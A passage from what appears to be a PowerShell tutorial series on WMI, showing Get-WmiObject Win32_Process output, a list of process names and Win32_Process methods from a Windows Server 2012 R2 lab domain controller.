"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Desktop\log.txt CreationClassName : Win32_Process CreationDate : 20170712153213.828260-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : notepad.exe ExecutablePath : C:\Windows\system32\NOTEPAD.EXE ExecutionState : Handle : 956 HandleCount : 94 InstallDate : KernelModeTime : 937500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : notepad.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 173 OtherTransferCount : 1420 PageFaults : 2987 PageFileUsage : 1460 ParentProcessId : 1188 PeakPageFileUsage : 1612 PeakVirtualSize : 101261312 PeakWorkingSetSize : 9816 Priority : 8 PrivatePageCount : 1495040 ProcessId : 956 QuotaNonPagedPoolUsage : 9 QuotaPagedPoolUsage : 185 QuotaPeakNonPagedPoolUsage : 9 QuotaPeakPagedPoolUsage : 195 ReadOperationCount : 1 ReadTransferCount : 60 SessionId : 1 Status : TerminationDate : ThreadCount : 1 UserModeTime : 312500 VirtualSize : 96096256 WindowsVersion : 6.3.9600 WorkingSetSize : 8454144 WriteOperationCount : 8 WriteTransferCount : 21612 PSComputerName : WIN-2012-DC ProcessName : notepad.exe Handles : 94 VM : 96096256 WS : 8454144 Path : C:\Windows\system32\NOTEPAD.EXE __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3416" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3416" Caption : powershell.exe CommandLine : "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CreationClassName : Win32_Process CreationDate : 20170712164403.172486-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : powershell.exe ExecutablePath : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ExecutionState : Handle : 3416 HandleCount : 497 InstallDate : KernelModeTime : 20937500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : powershell.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 72072 OtherTransferCount : 5471444 PageFaults : 294868 PageFileUsage : 111616 ParentProcessId : 1188 PeakPageFileUsage : 113024 PeakVirtualSize : 659030016 PeakWorkingSetSize : 119420 Priority : 8 PrivatePageCount : 114294784 ProcessId : 3416 QuotaNonPagedPoolUsage : 35 QuotaPagedPoolUsage : 433 QuotaPeakNonPagedPoolUsage : 38 QuotaPeakPagedPoolUsage : 436 ReadOperationCount : 1024 ReadTransferCount : 3479940 SessionId : 1 Status : TerminationDate : ThreadCount : 10 UserModeTime : 156093750 VirtualSize : 656982016 WindowsVersion : 6.3.9600 WorkingSetSize : 120922112 WriteOperationCount : 3 WriteTransferCount : 5430 PSComputerName : WIN-2012-DC ProcessName : powershell.exe Handles : 497 VM : 656982016 WS : 120922112 Path : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1928" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1928" Caption : conhost.exe CommandLine : \??\C:\Windows\system32\conhost.exe 0x4 CreationClassName : Win32_Process CreationDate : 20170712164403.172486-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : conhost.exe ExecutablePath : C:\Windows\system32\conhost.exe ExecutionState : Handle : 1928 HandleCount : 56 InstallDate : KernelModeTime : 17656250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : conhost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 47060 OtherTransferCount : 2990951 PageFaults : 3531 PageFileUsage : 5312 ParentProcessId : 3416 PeakPageFileUsage : 5456 PeakVirtualSize : 62046208 PeakWorkingSetSize : 13364 Priority : 8 PrivatePageCount : 5439488 ProcessId : 1928 QuotaNonPagedPoolUsage : 7 QuotaPagedPoolUsage : 113 QuotaPeakNonPagedPoolUsage : 8 QuotaPeakPagedPoolUsage : 114 ReadOperationCount : 23 ReadTransferCount : 756 SessionId : 1 Status : TerminationDate : ThreadCount : 2 UserModeTime : 1250000 VirtualSize : 61644800 WindowsVersion : 6.3.9600 WorkingSetSize : 13651968 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : conhost.exe Handles : 56 VM : 61644800 WS : 13651968 Path : C:\Windows\system32\conhost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1816" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1816" Caption : WmiPrvSE.exe CommandLine : C:\Windows\system32\wbem\wmiprvse.exe CreationClassName : Win32_Process CreationDate : 20170712164708.672298-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : WmiPrvSE.exe ExecutablePath : C:\Windows\system32\wbem\wmiprvse.exe ExecutionState : Handle : 1816 HandleCount : 327 InstallDate : KernelModeTime : 10781250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : WmiPrvSE.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 5019 OtherTransferCount : 78910 PageFaults : 42193 PageFileUsage : 21748 ParentProcessId : 572 PeakPageFileUsage : 24180 PeakVirtualSize : 103436288 PeakWorkingSetSize : 29212 Priority : 8 PrivatePageCount : 22269952 ProcessId : 1816 QuotaNonPagedPoolUsage : 22 QuotaPagedPoolUsage : 140 QuotaPeakNonPagedPoolUsage : 26 QuotaPeakPagedPoolUsage : 156 ReadOperationCount : 7 ReadTransferCount : 2721134 SessionId : 0 Status : TerminationDate : ThreadCount : 9 UserModeTime : 5312500 VirtualSize : 91705344 WindowsVersion : 6.3.9600 WorkingSetSize : 27447296 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : WmiPrvSE.exe Handles : 327 VM : 91705344 WS : 27447296 Path : C:\Windows\system32\wbem\wmiprvse.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="932" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="932" Caption : WmiApSrv.exe CommandLine : C:\Windows\system32\wbem\WmiApSrv.exe CreationClassName : Win32_Process CreationDate : 20170712164914.625986-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : WmiApSrv.exe ExecutablePath : C:\Windows\system32\wbem\WmiApSrv.exe ExecutionState : Handle : 932 HandleCount : 128 InstallDate : KernelModeTime : 156250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : WmiApSrv.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 350 OtherTransferCount : 24138 PageFaults : 1338 PageFileUsage : 1172 ParentProcessId : 440 PeakPageFileUsage : 1264 PeakVirtualSize : 29896704 PeakWorkingSetSize : 4956 Priority : 8 PrivatePageCount : 1200128 ProcessId : 932 QuotaNonPagedPoolUsage : 10 QuotaPagedPoolUsage : 56 QuotaPeakNonPagedPoolUsage : 12 QuotaPeakPagedPoolUsage : 57 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 5 UserModeTime : 0 VirtualSize : 29233152 WindowsVersion : 6.3.9600 WorkingSetSize : 5062656 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : WmiApSrv.exe Handles : 128 VM : 29233152 WS : 5062656 Path : C:\Windows\system32\wbem\WmiApSrv.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="840" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="840" Caption : WmiPrvSE.exe CommandLine : C:\Windows\system32\wbem\wmiprvse.exe CreationClassName : Win32_Process CreationDate : 20170712165108.172589-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : WmiPrvSE.exe ExecutablePath : C:\Windows\system32\wbem\wmiprvse.exe ExecutionState : Handle : 840 HandleCount : 136 InstallDate : KernelModeTime : 156250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : WmiPrvSE.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 120 OtherTransferCount : 122 PageFaults : 1403 PageFileUsage : 2060 ParentProcessId : 572 PeakPageFileUsage : 2060 PeakVirtualSize : 35057664 PeakWorkingSetSize : 5352 Priority : 8 PrivatePageCount : 2109440 ProcessId : 840 QuotaNonPagedPoolUsage : 10 QuotaPagedPoolUsage : 62 QuotaPeakNonPagedPoolUsage : 10 QuotaPeakPagedPoolUsage : 63 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 8 UserModeTime : 156250 VirtualSize : 35057664 WindowsVersion : 6.3.9600 WorkingSetSize : 5480448 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : WmiPrvSE.exe Handles : 136 VM : 35057664 WS : 5480448 Path : C:\Windows\system32\wbem\wmiprvse.exe PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Class Win32_process | Select Name Name ---- System Idle Process System smss.exe csrss.exe csrss.exe wininit.exe winlogon.exe services.exe lsass.exe svchost.exe svchost.exe dwm.exe VBoxService.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe Microsoft.ActiveDirectory.WebServices.exe dfsrs.exe dns.exe ismserv.exe wlms.exe dfssvc.exe vds.exe svchost.exe svchost.exe svchost.exe msdtc.exe taskhostex.exe explorer.exe VBoxTray.exe cmd.exe conhost.exe python.exe firefox.exe firefox.exe notepad.exe powershell.exe conhost.exe WmiPrvSE.exe WmiApSrv.exe WmiPrvSE.exe PS C:\Users\Administrator> ``` - Exploring ```Methods``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Class Win32_process -List NameSpace: ROOT\cimv2 Name Methods Properties ---- ------- ---------- Win32_Process {Create, Terminat... {Caption, CommandLine, CreationClassName, CreationDate...} PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Class Win32_process -List | Select-Object -ExpandProperty Methods Name : Create InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Constructor, Implemented, MappingStrings, Privileges...} Name : Terminate InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Destructor, Implemented, MappingStrings, Privileges...} Name : GetOwner InParameters : OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Implemented, MappingStrings, ValueMap} Name : GetOwnerSid InParameters : OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Implemented, MappingStrings, ValueMap} Name : SetPriority InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Implemented, MappingStrings, ValueMap} Name : AttachDebugger InParameters : OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Implemented, ValueMap} Name : GetAvailableVirtualSize InParameters : OutParameters : System.Management.ManagementBaseObject Origin : Win32_Process Qualifiers : {Implemented, ValueMap} PS C:\Users\Administrator> ``` ================================================ FILE: 33-Using-WMI-in-Powershell-Part-2.md ================================================ #### 33. Using WMI in Powershell Part 2 - Using ```Get-WmiObject``` - ```Local``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Class Win32_Process __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="0" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="0" Caption : System Idle Process CommandLine : CreationClassName : Win32_Process CreationDate : CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : System Idle Process ExecutablePath : ExecutionState : Handle : 0 HandleCount : 0 InstallDate : KernelModeTime : 199884687500 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : System Idle Process OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 0 OtherTransferCount : 0 PageFaults : 1 PageFileUsage : 0 ParentProcessId : 0 PeakPageFileUsage : 0 PeakVirtualSize : 65536 PeakWorkingSetSize : 4 Priority : 0 PrivatePageCount : 0 ProcessId : 0 QuotaNonPagedPoolUsage : 0 QuotaPagedPoolUsage : 0 QuotaPeakNonPagedPoolUsage : 0 QuotaPeakPagedPoolUsage : 0 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 1 UserModeTime : 0 VirtualSize : 65536 WindowsVersion : 6.3.9600 WorkingSetSize : 4096 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : System Idle Process Handles : 0 VM : 65536 WS : 4096 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="4" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="4" Caption : System CommandLine : CreationClassName : Win32_Process CreationDate : 20170712121425.018613-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : System ExecutablePath : ExecutionState : Handle : 4 HandleCount : 805 InstallDate : KernelModeTime : 479687500 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : System OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 3466 OtherTransferCount : 152451 PageFaults : 4798 PageFileUsage : 112 ParentProcessId : 0 PeakPageFileUsage : 276 PeakVirtualSize : 7389184 PeakWorkingSetSize : 1716 Priority : 8 PrivatePageCount : 114688 ProcessId : 4 QuotaNonPagedPoolUsage : 0 QuotaPagedPoolUsage : 0 QuotaPeakNonPagedPoolUsage : 0 QuotaPeakPagedPoolUsage : 0 ReadOperationCount : 195 ReadTransferCount : 53093300 SessionId : 0 Status : TerminationDate : ThreadCount : 75 UserModeTime : 0 VirtualSize : 3432448 WindowsVersion : 6.3.9600 WorkingSetSize : 139264 WriteOperationCount : 13174 WriteTransferCount : 207929144 PSComputerName : WIN-2012-DC ProcessName : System Handles : 805 VM : 3432448 WS : 139264 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="208" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="208" Caption : smss.exe CommandLine : CreationClassName : Win32_Process CreationDate : 20170712121425.018613-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : smss.exe ExecutablePath : ExecutionState : Handle : 208 HandleCount : 52 InstallDate : KernelModeTime : 156250 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : smss.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 266 OtherTransferCount : 31584 PageFaults : 595 PageFileUsage : 276 ParentProcessId : 4 PeakPageFileUsage : 336 PeakVirtualSize : 25382912 PeakWorkingSetSize : 1032 Priority : 11 PrivatePageCount : 282624 ProcessId : 208 QuotaNonPagedPoolUsage : 3 QuotaPagedPoolUsage : 13 QuotaPeakNonPagedPoolUsage : 7 QuotaPeakPagedPoolUsage : 53 ReadOperationCount : 4 ReadTransferCount : 29188 SessionId : 0 Status : TerminationDate : ThreadCount : 2 UserModeTime : 0 VirtualSize : 4317184 WindowsVersion : 6.3.9600 WorkingSetSize : 217088 WriteOperationCount : 1 WriteTransferCount : 32 PSComputerName : WIN-2012-DC ProcessName : smss.exe Handles : 52 VM : 4317184 WS : 217088 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="292" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="292" Caption : csrss.exe CommandLine : CreationClassName : Win32_Process CreationDate : 20170712121426.081561-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : csrss.exe ExecutablePath : ExecutionState : Handle : 292 HandleCount : 171 InstallDate : KernelModeTime : 5000000 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : csrss.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 14627 OtherTransferCount : 839996 PageFaults : 2988 PageFileUsage : 1552 ParentProcessId : 284 PeakPageFileUsage : 1552 PeakVirtualSize : 45264896 PeakWorkingSetSize : 3352 Priority : 13 PrivatePageCount : 1589248 ProcessId : 292 QuotaNonPagedPoolUsage : 11 QuotaPagedPoolUsage : 114 QuotaPeakNonPagedPoolUsage : 13 QuotaPeakPagedPoolUsage : 122 ReadOperationCount : 64 ReadTransferCount : 55340 SessionId : 0 Status : TerminationDate : ThreadCount : 8 UserModeTime : 781250 VirtualSize : 44208128 WindowsVersion : 6.3.9600 WorkingSetSize : 1372160 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : csrss.exe Handles : 171 VM : 44208128 WS : 1372160 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="344" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="344" Caption : csrss.exe CommandLine : CreationClassName : Win32_Process CreationDate : 20170712121426.456426-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : csrss.exe ExecutablePath : ExecutionState : Handle : 344 HandleCount : 185 InstallDate : KernelModeTime : 3906250 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : csrss.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 3146 OtherTransferCount : 69640 PageFaults : 65653 PageFileUsage : 1496 ParentProcessId : 336 PeakPageFileUsage : 1552 PeakVirtualSize : 85655552 PeakWorkingSetSize : 35324 Priority : 13 PrivatePageCount : 1531904 ProcessId : 344 QuotaNonPagedPoolUsage : 16 QuotaPagedPoolUsage : 162 QuotaPeakNonPagedPoolUsage : 17 QuotaPeakPagedPoolUsage : 192 ReadOperationCount : 34150 ReadTransferCount : 1055474 SessionId : 1 Status : TerminationDate : ThreadCount : 10 UserModeTime : 312500 VirtualSize : 71057408 WindowsVersion : 6.3.9600 WorkingSetSize : 23605248 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : csrss.exe Handles : 185 VM : 71057408 WS : 23605248 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="352" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="352" Caption : wininit.exe CommandLine : wininit.exe CreationClassName : Win32_Process CreationDate : 20170712121426.456426-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : wininit.exe ExecutablePath : C:\Windows\system32\wininit.exe ExecutionState : Handle : 352 HandleCount : 79 InstallDate : KernelModeTime : 312500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : wininit.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1036 OtherTransferCount : 2788 PageFaults : 1112 PageFileUsage : 728 ParentProcessId : 284 PeakPageFileUsage : 956 PeakVirtualSize : 45092864 PeakWorkingSetSize : 3524 Priority : 13 PrivatePageCount : 745472 ProcessId : 352 QuotaNonPagedPoolUsage : 8 QuotaPagedPoolUsage : 88 QuotaPeakNonPagedPoolUsage : 10 QuotaPeakPagedPoolUsage : 90 ReadOperationCount : 1 ReadTransferCount : 6656 SessionId : 0 Status : TerminationDate : ThreadCount : 1 UserModeTime : 156250 VirtualSize : 41603072 WindowsVersion : 6.3.9600 WorkingSetSize : 294912 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : wininit.exe Handles : 79 VM : 41603072 WS : 294912 Path : C:\Windows\system32\wininit.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="380" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="380" Caption : winlogon.exe CommandLine : winlogon.exe CreationClassName : Win32_Process CreationDate : 20170712121426.472426-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : winlogon.exe ExecutablePath : C:\Windows\system32\winlogon.exe ExecutionState : Handle : 380 HandleCount : 156 InstallDate : KernelModeTime : 937500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : winlogon.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1216 OtherTransferCount : 145120 PageFaults : 10679 PageFileUsage : 1216 ParentProcessId : 336 PeakPageFileUsage : 2624 PeakVirtualSize : 59760640 PeakWorkingSetSize : 8728 Priority : 13 PrivatePageCount : 1245184 ProcessId : 380 QuotaNonPagedPoolUsage : 9 QuotaPagedPoolUsage : 117 QuotaPeakNonPagedPoolUsage : 14 QuotaPeakPagedPoolUsage : 117 ReadOperationCount : 3 ReadTransferCount : 144816 SessionId : 1 Status : TerminationDate : ThreadCount : 2 UserModeTime : 0 VirtualSize : 58621952 WindowsVersion : 6.3.9600 WorkingSetSize : 8900608 WriteOperationCount : 1 WriteTransferCount : 160 PSComputerName : WIN-2012-DC ProcessName : winlogon.exe Handles : 156 VM : 58621952 WS : 8900608 Path : C:\Windows\system32\winlogon.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="440" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="440" Caption : services.exe CommandLine : CreationClassName : Win32_Process CreationDate : 20170712121426.721992-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : services.exe ExecutablePath : ExecutionState : Handle : 440 HandleCount : 220 InstallDate : KernelModeTime : 2187500 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : services.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 2992 OtherTransferCount : 66586 PageFaults : 4283 PageFileUsage : 2160 ParentProcessId : 352 PeakPageFileUsage : 2920 PeakVirtualSize : 29523968 PeakWorkingSetSize : 5740 Priority : 9 PrivatePageCount : 2211840 ProcessId : 440 QuotaNonPagedPoolUsage : 10 QuotaPagedPoolUsage : 91 QuotaPeakNonPagedPoolUsage : 17 QuotaPeakPagedPoolUsage : 92 ReadOperationCount : 6 ReadTransferCount : 243828 SessionId : 0 Status : TerminationDate : ThreadCount : 4 UserModeTime : 2343750 VirtualSize : 21508096 WindowsVersion : 6.3.9600 WorkingSetSize : 2916352 WriteOperationCount : 1 WriteTransferCount : 160 PSComputerName : WIN-2012-DC ProcessName : services.exe Handles : 220 VM : 21508096 WS : 2916352 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="448" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="448" Caption : lsass.exe CommandLine : C:\Windows\system32\lsass.exe CreationClassName : Win32_Process CreationDate : 20170712121426.768868-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : lsass.exe ExecutablePath : C:\Windows\system32\lsass.exe ExecutionState : Handle : 448 HandleCount : 1280 InstallDate : KernelModeTime : 72343750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : lsass.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 52553 OtherTransferCount : 4821854 PageFaults : 40173 PageFileUsage : 37732 ParentProcessId : 352 PeakPageFileUsage : 64580 PeakVirtualSize : 1225867264 PeakWorkingSetSize : 66640 Priority : 9 PrivatePageCount : 38637568 ProcessId : 448 QuotaNonPagedPoolUsage : 123 QuotaPagedPoolUsage : 182 QuotaPeakNonPagedPoolUsage : 148 QuotaPeakPagedPoolUsage : 187 ReadOperationCount : 8959 ReadTransferCount : 81985973 SessionId : 0 Status : TerminationDate : ThreadCount : 27 UserModeTime : 46875000 VirtualSize : 1202966528 WindowsVersion : 6.3.9600 WorkingSetSize : 28327936 WriteOperationCount : 1541 WriteTransferCount : 2072357 PSComputerName : WIN-2012-DC ProcessName : lsass.exe Handles : 1280 VM : 1202966528 WS : 28327936 Path : C:\Windows\system32\lsass.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="572" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="572" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k DcomLaunch CreationClassName : Win32_Process CreationDate : 20170712121428.268496-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 572 HandleCount : 364 InstallDate : KernelModeTime : 1562500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 533 OtherTransferCount : 22364 PageFaults : 5554 PageFileUsage : 3372 ParentProcessId : 440 PeakPageFileUsage : 8228 PeakVirtualSize : 50991104 PeakWorkingSetSize : 12264 Priority : 8 PrivatePageCount : 3452928 ProcessId : 572 